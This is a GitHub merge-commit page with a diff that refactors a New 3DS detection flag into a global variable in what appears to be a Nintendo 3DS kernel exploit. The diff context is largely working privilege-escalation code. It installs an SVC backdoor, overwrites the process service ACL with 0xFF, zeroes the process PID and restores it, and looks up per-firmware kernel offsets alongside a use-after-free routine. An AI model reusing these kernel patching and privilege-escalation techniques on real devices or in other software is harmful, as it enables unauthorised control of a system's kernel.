Merge pull request #49 from d3m3vilurr/global-variable-for-is-new3ds

Cleanup is_n3ds variable
nedwill · Jan 8, 2017 · 79ee164 · 79ee164
2 parents 908c6d4 + 4ed21d8
commit 79ee164
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 22 deletions.
diff --git a/source/backdoor.c b/source/backdoor.c
@@ -11,7 +11,7 @@
 #define SEND_SYNC_REQUEST3 0x30
 #define SVC_BACKDOOR_NUM 0x7B
 #define CURRENT_PROCESS 0xFFFF9004
-#define HANDLE_TABLE_OFFSET(is_new3ds) ((is_new3ds) ? 0xDC : 0xD4)
+#define HANDLE_TABLE_OFFSET ((is_n3ds) ? 0xDC : 0xD4)
 
 #define EXC_VA_START  ((u32*)0xFFFF0000)
 #define AXIWRAMDSP_RW_MAPPING_OFFSET (0xDFF00000 - 0x1FF00000)
@@ -29,6 +29,8 @@ void *(*handle_lookup_kern)(void *, u32);
 void **svc_handler_table_writable;
 u32 *svc_acl_check_writable;
 
+extern bool is_n3ds;
+
 static void writeint() { *writeint_arg_addr = writeint_arg_value; }
 
 static void memcpy_int() {
@@ -131,9 +133,7 @@ static void kernel_get_object_addr() {
   kdisable_interrupts();
   Handle handle = get_object_handle;
   u32 current_process = *(u32 *)CURRENT_PROCESS;
-  bool is_new3ds;
-  APT_CheckNew3DS(&is_new3ds);
-  u32 process_handle_table = current_process + HANDLE_TABLE_OFFSET(is_new3ds);
+  u32 process_handle_table = current_process + HANDLE_TABLE_OFFSET;
   get_object_ret = handle_lookup_kern((void *)process_handle_table, handle);
 }
 

diff --git a/source/exploit.c b/source/exploit.c
@@ -16,11 +16,12 @@ extern u32 *svc_acl_check_writable;
 u32 ktimer_pool_size;
 u32 ktimer_base_offset;
 void *ktimer_pool_head;
+bool is_n3ds;
 
 #define CURRENT_PROCESS 0xFFFF9004
 #define CURRENT_KTHREAD 0xFFFF9000
-#define PROCESS_ACL_OFFSET(is_new3ds) ((is_new3ds) ? 0x24 : 0x22)
-#define PROCESS_PID_OFFSET(is_new3ds) ((is_new3ds) ? 0x2F : 0x2D)
+#define PROCESS_ACL_OFFSET ((is_n3ds) ? 0x24 : 0x22)
+#define PROCESS_PID_OFFSET ((is_n3ds) ? 0x2F : 0x2D)
 #define SVC_ACL_SIZE 0x10
 #define LINEAR_KERN_TO_USER(addr) ((addr) - 0xE0000000 + 0x14000000)
 
@@ -194,10 +195,9 @@ static version_table o_table[] = {
 
 static bool initialize_handle_address() {
   u32 kver = osGetKernelVersion();
-  bool n3ds = false;
-  APT_CheckNew3DS(&n3ds);
+  APT_CheckNew3DS(&is_n3ds);
 
-  version_table *table = n3ds ? n_table : o_table;
+  version_table *table = is_n3ds ? n_table : o_table;
 
   while (table->kver) {
     if (table->kver == kver) {
@@ -211,7 +211,7 @@ static bool initialize_handle_address() {
       ktimer_pool_head = (void *)table->ktimer_pool_head;
       ktimer_pool_size = table->ktimer_pool_size;
       // temporary hack
-      if (!n3ds) {
+      if (!is_n3ds) {
         ktimer_pool_size = kver <= SYSTEM_VERSION(2, 46, 0) ? 0xE50 : 0xE10;
       }
       ktimer_base_offset = table->ktimer_base_offset;
@@ -235,7 +235,6 @@ static bool try_uaf(u32 attempts) {
   return false;
 }
 
-static bool *kernel_patch_args;
 static u32 kernel_patch_ret;
 static s32 kernel_pid_orig;
 
@@ -244,10 +243,8 @@ static void kernel_patch_acl() {
 
   kernel_patch_ret = 0;
 
-  bool is_new = *kernel_patch_args;
-
   u32 *current_process = *(u32**)(CURRENT_PROCESS);
-  u32 *proc_acl = current_process + PROCESS_ACL_OFFSET(is_new);
+  u32 *proc_acl = current_process + PROCESS_ACL_OFFSET;
   memset(proc_acl, 0xFF, SVC_ACL_SIZE);
 
   u32 **current_kthread = *(u32***)(CURRENT_KTHREAD);
@@ -260,11 +257,10 @@ static void kernel_patch_acl() {
 static void kernel_patch_pid() {
   __asm__ volatile("cpsid aif");
 
-  bool is_new = *kernel_patch_args;
   kernel_patch_ret = 0;
 
   u32 *current_process = *(u32**)(CURRENT_PROCESS);
-  u32 *pid = current_process + PROCESS_PID_OFFSET(is_new);
+  u32 *pid = current_process + PROCESS_PID_OFFSET;
   kernel_pid_orig = *pid;
   *pid = 0;
 
@@ -274,22 +270,17 @@ static void kernel_patch_pid() {
 static void kernel_restore_pid() {
   __asm__ volatile("cpsid aif");
 
-  bool is_new = *kernel_patch_args;
   kernel_patch_ret = 0;
 
   u32 *current_process = *(u32**)(CURRENT_PROCESS);
-  u32 *pid = current_process + PROCESS_PID_OFFSET(is_new);
+  u32 *pid = current_process + PROCESS_PID_OFFSET;
   *pid = kernel_pid_orig;
 
   kernel_patch_ret = 1;
 }
 
 /* Copy from waithax & svchax */
 bool elevate_system_privilege() {
-  bool is_new;
-  APT_CheckNew3DS(&is_new);
-  kernel_patch_args = &is_new;
-
   svcGlobalBackdoor((s32(*)(void)) & kernel_patch_acl);
 
   if (!kernel_patch_ret) {